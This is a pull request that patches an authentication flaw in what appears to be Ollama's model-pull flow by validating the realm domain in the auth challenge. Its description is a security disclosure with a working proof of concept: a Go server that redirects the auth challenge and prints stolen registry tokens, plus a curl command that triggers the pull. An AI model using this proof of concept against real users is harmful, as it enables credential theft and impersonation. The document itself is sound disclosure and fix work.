### PR TITLE
Fixed cross-domain authentication token exposure

### DIFF
--- a/server/auth.go
+++ b/server/auth.go
@@ -31,6 +31,10 @@ func (r registryChallenge) URL() (*url.URL, error) {
 		return nil, err
 	}
 
+	if r.Service != "" && !strings.HasSuffix(redirectURL.Host, r.Service) && !strings.HasSuffix(r.Service, redirectURL.Host) {
+		return nil, fmt.Errorf("realm domain %q does not match service domain %q", redirectURL.Host, r.Service)
+	}
+
 	values := redirectURL.Query()
 	values.Add("service", r.Service)
 	for _, s := range strings.Split(r.Scope, " ") {


### PR DESCRIPTION
### Description
The authentication flow contains a vulnerability in its model pulling mechanism. When a user pulls a model from an HTTPS server that responds with a 401 Unauthorized status, Ollama follows the WWW-Authenticate header's realm URL without validating if it belongs to the same domain as the original request. This allows an attacker to redirect the authentication flow to any domain, including registry.ollama.ai, and capture valid authentication tokens.

The issue exists in the authentication challenge handling logic, where Ollama does not verify that the authentication realm in the WWW-Authenticate header is from the same domain as the initial request. This enables cross-domain authentication flow redirection and token stealing.


### Proof of Concept
This PoC demonstrates how an attacker can steal valid registry.ollama.ai authentication tokens:

1. Start the Ollama server:

```bash
go run main.go serve
```

2. Create token-capture server (token_capture.go):
```go
package main

import (
    "fmt"
    "log"
    "net/http"
)

func main() {
    http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
        fmt.Printf("Request: %s %s\n", r.Method, r.URL.String())
        
        if r.Header.Get("Authorization") == "" {
            w.Header().Set("WWW-Authenticate", `Bearer realm="https://registry.ollama.ai/v2/token",service="ollama",scope="-"`)
            w.WriteHeader(http.StatusUnauthorized)
            w.Write([]byte("Unauthorized"))
            return
        }
        
        fmt.Printf("STOLEN TOKEN: %s\n", r.Header.Get("Authorization"))
        w.WriteHeader(http.StatusTeapot)
        w.Write([]byte("Token captured"))
    })
    
    log.Fatal(http.ListenAndServe(":8000", nil))
}
```

3. Run the token capture server:
```bash
go run token_capture.go
```

4. Trigger the vulnerability:
```bash
curl http://localhost:11434/api/pull -d '{
  "model": "http://127.0.0.1:8000/{model}",
}'
```

5. Observe the stolen token in the server output.

### Impact
This vulnerability allows attackers to:

- Steal authentication tokens for registry.ollama.ai by tricking users into pulling models from malicious servers
- Access private models the user has permission to access in the registry
- Push malicious models under the victim's identity if they have write access


**Version**: 0.6.7
**CVSS v3.1 Score:** 6.9 (Medium)
**Vector String:** CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N